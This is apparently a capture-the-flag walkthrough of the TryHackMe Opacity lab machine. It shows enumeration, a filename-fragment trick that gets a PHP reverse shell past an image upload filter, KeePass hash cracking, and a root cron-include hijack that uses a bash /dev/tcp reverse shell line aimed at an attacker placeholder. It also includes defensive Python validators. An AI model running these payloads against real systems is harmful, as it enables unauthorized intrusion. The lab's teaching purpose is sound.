TryHackMe Opacity is an easy machine that can help you in the penetration testing learning process. We perform a file upload bypass and then exploit a cron job that is vulnerable because of insufficient directory permissions. There are 2 hash keys located on the machine (user – local.txt and root – proof.txt). Can you find them and become root?
Initial Enumeration
The process kicks off with network scanning using nmap.
nmap -A <target_IP>
This comprehensive scan (the -A switch) reveals the following open ports:
- Port 22: SSH (Secure Shell)
- Port 80: HTTP (Hypertext Transfer Protocol) – Identified as the primary initial attack surface.
- Ports 139 & 445: Samba (SMB/CIFS file sharing)
Web Server Analysis and Exploitation
Navigating to the web server on port 80 initially presents a login form. However, the video stresses bypassing this login and focusing on directory enumeration.
- Directory Brute-forcing: The tool `gobuster` is used to discover hidden directories.
gobuster dir -u http://<target_IP>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
This scan uncovers a `/cloud` directory.
- File Upload Vulnerability: The `/cloud` directory features an interface for uploading files via an external URL. This is identified as a vector for a reverse shell attack. The video specifically mentions using a “pen test monkey reverse shell” (a common PHP reverse shell) and highlights the necessity of configuring the attacker’s IP address and listening port within the shell script.
- Hosting the Reverse Shell: To serve the malicious shell script for the upload, a simple Python HTTP server is started on the attacker’s machine.
python3 -m http.server 8000
- Bypassing File Extension Filters: The initial upload attempt fails due to server-side validation expecting an image file. A clever bypass technique is demonstrated:
  - The PHP reverse shell (e.g., `shell.php`) is renamed by appending `#` followed by a fake image extension (e.g., `shell.php#a.png`).
  - The web server processes the filename up to the `#` character (executing `shell.php`), while the filter is tricked by the apparent `.png` extension.
- Triggering the Shell: After a successful upload using the crafted URL (e.g., `http://<attacker_IP>:8000/shell.php#a.png`), the provided link to the “image” is accessed. Crucially, the `#a.png` portion is removed from the URL in the browser to ensure the PHP code executes. This action establishes a reverse shell connection back to the attacker’s machine, which is listening for incoming connections (e.g., using `nc -lvnp 4545`).
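The `#` trick works because the fragment is not part of the path an HTTP client actually requests, so a filter that inspects the raw URL string and the file the server ends up fetching disagree. As an added example (not code from the Opacity machine or the video, and the application's real filter logic is an assumption), here is that naive check beside a hardened one that validates the parsed path and the downloaded bytes, and lets the server choose the stored name:

```python
import posixpath
import secrets
from urllib.parse import urlsplit

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}
# Magic bytes for the image types we accept (constructed lookup table).
MAGIC = {b"\x89PNG\r\n\x1a\n": ".png", b"\xff\xd8\xff": ".jpg",
         b"GIF87a": ".gif", b"GIF89a": ".gif"}

def naive_is_image_url(url: str) -> bool:
    """Assumed vulnerable check: tests the raw string, so a URL ending in
    '#a.png' passes even though the client will fetch shell.php."""
    return url.lower().endswith(tuple(ALLOWED_EXT))

def hardened_is_image_url(url: str) -> bool:
    """Validate only the component that is actually requested: the path.
    urlsplit separates the fragment (#...), which is never sent to a server."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return False
    name = posixpath.basename(parts.path)
    ext = posixpath.splitext(name)[1].lower()
    return ext in ALLOWED_EXT

def sniff_image_ext(data: bytes):
    """Return the extension implied by the file header, or None."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None

def safe_store_name(url: str, data: bytes):
    """Server-side decision for a fetch-by-URL upload: accept only if both the
    requested path and the downloaded bytes look like an image, and pick a
    random server-chosen name so the client never controls the extension."""
    if not hardened_is_image_url(url):
        return None
    ext = sniff_image_ext(data)
    if ext is None:
        return None
    return secrets.token_hex(8) + ext

# Constructed samples: the crafted URL shape from the walkthrough, a PNG header.
CRAFTED_URL = "http://10.10.10.10:8000/shell.php#a.png"
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_BYTES = b"<?php echo 'not an image'; ?>"
```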
User Privilege Escalation
The initial reverse shell provides access as the web server user (often `www-data`).
- Shell Stabilization: The raw shell is typically upgraded to a more interactive and stable shell.
- Internal Enumeration:
  - The home directory of a user named `sysadmin` (`/home/sysadmin`) is discovered.
  - Inside, `local.txt` (likely the user flag) and a `scripts` directory are found. Attempting to read `local.txt` fails due to insufficient permissions.
  - Further investigation in `/opt` reveals a file named `data.kdbx`. This extension signifies a KeePass password database.
- KeePass Database Cracking:
  - Transferring the Database: A Python HTTP server is started on the target machine within the `/opt` directory to serve the `data.kdbx` file.
python3 -m http.server 80
Then, `wget` is used on the attacker’s machine to download it.
wget http://<target_IP>/data.kdbx
  - Hash Extraction: The `keepass2john` utility converts the `.kdbx` file into a hash format that John the Ripper can understand.
keepass2john data.kdbx > keepass_hash.txt
  - Password Cracking: John the Ripper is used with a wordlist (e.g., `rockyou.txt`) to crack the master password for the KeePass database.
john --wordlist=/usr/share/wordlists/rockyou.txt keepass_hash.txt
- Gaining User Access: The cracked master password opens the `data.kdbx` file (using KeePassXC or a similar tool), revealing credentials for the `sysadmin` user. These credentials are then used to log in via SSH.
ssh sysadmin@<target_IP>
- Reading the User Flag: Once logged in as `sysadmin`, the `local.txt` file can be read.
cat /home/sysadmin/local.txt
Root Privilege Escalation
With `sysadmin` access, the focus shifts to escalating privileges to root.
- Analyzing the `scripts` Directory: The previously found `/home/sysadmin/scripts` directory contains `Library/` (a subdirectory) and `skill.php` (a PHP script). Examining `skill.php` reveals it’s a backup script that:
  - Archives the `scripts` directory.
  - Copies the archive to `/var/backups`.
  - Deletes files from `/var/www/html/cloud/images/`.
  The script also `include`s a file named `backup.inc` from the `Library/` subdirectory. It’s likely this script is run periodically by a cron job, potentially as root.
- Identifying the Vulnerability:
  - An initial idea is to modify `skill.php` directly. However, `skill.php` is owned by root and not writable by `sysadmin`.
  - The key lies in the permissions of the `Library/` directory. While `Library/backup.inc` is owned by root, the `Library/` directory itself is owned by `sysadmin` and is writable by `sysadmin`.
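The weakness is not in `backup.inc` itself but in who owns the directory that the root cron job loads it from: a root-owned file in a user-owned directory can be deleted and recreated by that user. As an added example (not from the machine or the video), this Python audit resolves a PHP script's literal `include`/`require` targets and flags any whose parent directory an untrusted user could modify; `run_demo` builds a constructed copy of the `scripts/Library/backup.inc` layout in a temp directory and uses the current uid to stand in for root.

```python
import os
import re
import stat
import tempfile

# Literal include/require targets only; dynamic includes are out of scope.
INCLUDE_RE = re.compile(
    r"""\b(?:include|require)(?:_once)?\s*\(?\s*['"]([^'"]+)['"]""")

def php_includes(script_path):
    """Return include/require targets of a PHP script, resolved relative to
    the script's own directory."""
    base = os.path.dirname(os.path.abspath(script_path))
    with open(script_path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return [os.path.normpath(os.path.join(base, p))
            for p in INCLUDE_RE.findall(src)]

def parent_replaceable(path, trusted_uid):
    """True if the directory holding `path` lets someone other than the
    trusted user delete and recreate the file: owned by another uid, or
    group/world-writable without the sticky bit. The file's own ownership
    is irrelevant here, which is exactly the Opacity mistake."""
    st = os.stat(os.path.dirname(path) or ".")
    if st.st_uid != trusted_uid:
        return True
    group_other_write = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
    return bool(group_other_write) and not (st.st_mode & stat.S_ISVTX)

def audit_cron_php(script_path, trusted_uid=0):
    """List include targets a cron job running as trusted_uid (root by
    default) would load from a directory an untrusted user can modify."""
    return [t for t in php_includes(script_path)
            if parent_replaceable(t, trusted_uid)]

def run_demo(library_mode):
    """Constructed scripts/Library layout; the current uid stands in for root."""
    root = tempfile.mkdtemp()
    lib = os.path.join(root, "Library")
    os.mkdir(lib)
    with open(os.path.join(lib, "backup.inc"), "w") as fh:
        fh.write("<?php // constructed placeholder ?>\n")
    with open(os.path.join(root, "skill.php"), "w") as fh:
        fh.write('<?php include("Library/backup.inc"); ?>\n')
    os.chmod(lib, library_mode)
    return audit_cron_php(os.path.join(root, "skill.php"), os.getuid())
```

The fix the audit points at is to make `Library/` (and the whole `scripts` tree a root cron job reads) root-owned and not group/world-writable, so `backup.inc` can no longer be swapped out.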
- Exploiting the Writable Directory: `sysadmin` can delete the original `Library/backup.inc` and then create a new `Library/backup.inc` file containing a PHP reverse shell payload (configured with the attacker’s IP and a new listening port).
<?php
// Contents of the malicious backup.inc: a PHP reverse shell targeting the attacker's IP and port
shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker_IP>/<new_port> 0>&1'");
?>
- Gaining Root Access:
  - A new netcat listener is started on the attacker’s machine on the `<new_port>`.
  - When the cron job executes `skill.php` (as root), it will include and execute the malicious `Library/backup.inc`.
  - This triggers the PHP reverse shell, connecting back to the attacker’s listener with root privileges.
  - The root flag (`/root/root.txt`) can then be read.
This multi-stage attack effectively demonstrates common penetration testing techniques, from initial web server enumeration and exploitation to sophisticated privilege escalation tactics.
TryHackMe Opacity Room Answers
What is the proof.txt flag?